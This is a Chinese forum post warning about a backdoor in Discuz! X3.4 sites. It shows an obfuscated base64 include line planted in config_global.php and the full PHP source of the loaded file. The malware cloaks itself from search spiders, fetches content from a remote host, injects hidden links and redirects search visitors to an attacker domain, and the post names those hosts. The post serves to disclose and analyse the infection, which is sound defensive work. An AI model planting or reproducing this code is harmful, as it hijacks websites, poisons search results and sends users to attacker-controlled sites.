本帖最后由 民审-M 于 2018-9-28 16:22 编辑 Discuz! X3.4版本以下/config/config_global.php注入漏洞:
@include(base64_decode('L3RtcC8uVGVzdC11bml4L2NsaWVudC5waHA='));
解析:
写入
服务器/tmp/.Test-unix/client.php
远程控制注入地址:
Quotewww.womendemengxiang.com
Quotegbk.baidu901.com
Quote9a9vj.com:8888
内容:
<?php
ob_start("ob_gzhandler");
ini_set('html_errors',false);
ini_set('display_errors',false);
define("APP_INCLUDE_FLAG","TRUE");
define('APP_JACK_CHARSET','GBK');
header("Content-type: text/html; charset=".APP_JACK_CHARSET);
define('APP_JACK_DOCUMENTROOT','/tmp/.X11-unix/');
define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'z'.rand(1,6).'');
define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'m');
define('APP_JACK_ARTICLE',APP_JACK_DOCUMENTROOT.'w');
define('APP_JACK_DES',APP_JACK_DOCUMENTROOT.'ms');
define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'b');
define('APP_JACK_BIANLIANG_B',APP_JACK_DOCUMENTROOT.'b2');
define('APP_JACK_BIANLIANG_C',APP_JACK_DOCUMENTROOT.'b3');
define('APP_MIX_KWD_FILE',APP_JACK_DOCUMENTROOT.'hh');
define('APP_JACK_CACHED','Uncached');
define('APP_JACK_MIN_PAR','3');
define('APP_JACK_MAX_PAR','3');
define('APP_JACK_MIN','10');
define('APP_JACK_MAX','15');
define('APP_JACK_APPFILE',APP_JACK_DOCUMENTROOT.'a');
function App_GetLink(){
$link = array();
$link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
$link[] = "http://www.discuz.net/forum-".rand(1000,999999999)."-1.html";
$link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
return $link[mt_rand(0,count($link)-1)];
}
function App_GetSelf(){
$link = array();
$link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
$link[] = "http://www.discuz.net/forum-".rand(1000,999999999)."-1.html";
$link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
return $link[mt_rand(0,count($link)-1)];
}
//返回图片
function getImg(){
return 'http://www.womendemengxiang.com/imgr/images/'.rand(1,260).".jpg";
}
$my_app = new missclient();
$my_app->run();
class missclient{
public $show_spider;
public $jump_ref;
public $http_ref_filter;
public $jump_url = "";
public $domain = "";
public $condition = "";
public $app_server = "";
public $log_spider = "";
public $cur_spider = "";
public $allow_ip = "";
public $isCache = false;
public function run(){
$this->domain = 'discuz';
$this->jump_ref = explode("|","baidu.|haoso.|haosou.|bing.|sogou.|soso.|so.com|.sm.cn|spm=");
$this->http_ref_filter = explode("|","inurl:|site:|site%3A|inurl%3A");
$this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
$this->condition = (($_GET['tid']> 1000000 && $this->isAllowdIp()) || ($_GET['fid']> 1000 && $this->isAllowdIp()) || ($_GET['mid']> 1 && $this->isAllowdIp()));
$this->app_server = "http://gbk.baidu901.com/app.php";
$this->isCache = False;
if($this->isSpider() && $this->isAllowdIp()){
if($this->condition){
if($this->isCache){
$relset_host = $this->getServerName();
$dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
$cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6);
if(!@file_exists($dir)){
mkdir($dir, 0777);
}
if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){
$var = coreAppCache::read($cacheFile);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach($var as $key=>$v){
$flag = "{".$key."}";
$page = str_replace($flag,$v,$page);
}
echo $page;
exit();
}
else
{
//包含进APP即可
$currentPage = include(APP_JACK_APPFILE);
if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,"</explode>")){
$var = self::cut($currentPage,"<explode>","</explode>");
$var = coreAppCache::decode($var);
$page = file_get_contents(APP_JACK_TEMPLATE);
foreach($var as $key=>$v){
$flag = "{".$key."}";
$page = str_replace($flag,$v,$page);
}
echo $page;
@coreAppCache::writenocode($currentPage,$cacheFile);
}
}
die();
}
else
{
$currentPage = include(APP_JACK_APPFILE);
echo $currentPage;
die();
}
}
else
{
$this->_uncondition_hook();
}
}
else
{
if($this->isRef() && $this->condition){
$this->Jump();
}
else
{
$this->_unSpider_hook();
}
}
}
public function isAllowdIp(){
$ip = $this->clientIp();
$non_list = explode("|",$this->allow_ip);
foreach($non_list as $iplist){
if(@stristr($ip,$iplist)){
return false;
}
}
return true;
}
public function clientIp(){
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
preg_match("/[\d\.]{7,15}/", $onlineip, $onlineipmatches);
$onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
unset($onlineipmatches);
return $onlineip;
}
public function isSpider(){
$bots = array(
//'Baidu' => 'baiduspider',
'Sogou' => 'sogou',
//'Haoso' => 'haosouspider',
//'360spider' => '360spider',
'bingbot' => 'bingbot'
);
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
foreach ($bots as $k => $v){
if (stristr($userAgent,$v)){
if(!empty($this->log_spider)){
@file_put_contents($this->log_spider,$v."->Visited ".$_SERVER['QUERY_STRING']."at: ".date("Y-m-d H:i:s")."\n",FILE_APPEND);
}
$this->cur_spider = $k;
return true;
break;
}
}
return false;
}
public function isRef(){
$ref = strtolower(@$_SERVER['HTTP_REFERER']);
if(isset($_COOKIE["domain-filter-bypass"])){
return false;
}
if(!$this->isAllowdIp()){
setcookie("domain-filter-bypass", "lol", time() + 259200);
return false;
}
foreach($this->http_ref_filter as $r){
$r = trim($r);
if(stristr($ref,$r)){
setcookie("domain-filter-bypass", "lol", time() + 259200);
return false;
}
}
foreach($this->jump_ref as $r){
$r = trim($r);
if(stristr($ref,$r)){
return true;
}
}
}
public function getServerName()
{
$ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']:$_SERVER['HTTP_HOST']);
if( strpos($ServerName,'http://') )
{
return str_replace('http://','',$ServerName);
}
return $ServerName;
}
public function getPage(){
if($this->isCache){
$cache="cached";
}
$url = $this->app_server."?domain=".$this->domain."&gid=199&spider=".$this->cur_spider."&cache=".$cache."&localPar=".http_build_query($_GET);
return $this->HttpVisit($url);
}
public function HttpVisit($weburl) {
$remote_data = NULL;
if (function_exists('curl_exec')) {
$curl = @curl_init();
@curl_setopt($curl, CURLOPT_URL, $weburl);
@curl_setopt($curl, CURLOPT_HEADER, 0);
@curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
@curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$remote_data = @curl_exec($curl);
@curl_close($curl);
} else {
if (function_exists('stream_context_create')) {
$header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
$http_header = @stream_context_create($header_array);
$remote_data = @file_get_contents($weburl, false, $http_header);
} else {
$temp_url = explode("/", $weburl);
$new_url = $temp_url[2];
$http_port = 80;
$get_file = substr($weburl, strlen($new_url) + 7);
if (strstr($new_url, chr(58))) {
$s_var_array['td'] = explode(chr(58), $new_url);
$new_url = $s_var_array['td'][0];
$http_port = $s_var_array['td'][1];
}
$fsock_result = @fsockopen($new_url, $http_port);
@fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "\r\n" . 'Host:' . $new_url . "\r\n" . 'Connection:Close' . "\r\n\r\n");
while (!feof($fsock_result)) {
$remote_data .= fgets($fsock_result, 1024);
}
@fclose($fsock_result);
}
}
return $remote_data;
}
public function Jump(){
if($this->isAllowdIp()){
$domain = str_replace(".","_",$this->domain);
header('Location: http://9a9vj.com:8888/?jpb_'.$domain);
exit;
}
}
public function _uncondition_hook(){
$array = array();
for($a=0;$a<100;$a++){
echo '<a href="'.App_GetLink().'"></a>'."\n";
}
}
public function _unSpider_hook(){
//
}
public function strStartWith($needle, $haystack){
return (substr($haystack, 0, strlen($needle))==$needle);
}
public function rndStr($length=8){
$str = null;
$strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
$max = strlen($strPol)-1;
for($i=0;$i<$length;$i++){
$str.=$strPol[rand(0,$max)];
}
return $str;
}
public function cut($file,$from,$end)
{
$message=explode($from,$file);
$message=explode($end,$message[1]);
return $message[0];
}
}
class coreAppCache{
//写入缓存
public function write($file,$filename){
return file_put_contents($filename,self::encode($file));
}
public function writenocode($file,$filename){
return file_put_contents($filename,$file);
}
public function read($filename){
$content = file_get_contents($filename);
if(stristr($content,"</explode>")){
$content = self::cut($content,"<explode>","</explode>");
}
return self::decode($content);
}
public function encode($file){
return base64_encode(gzcompress(serialize($file)));
}
public function decode($file){
return unserialize(gzuncompress(base64_decode($file)));
}
public function cut($file,$from,$end)
{
$message=explode($from,$file);
$message=explode($end,$message[1]);
return $message[0];
}
}
?>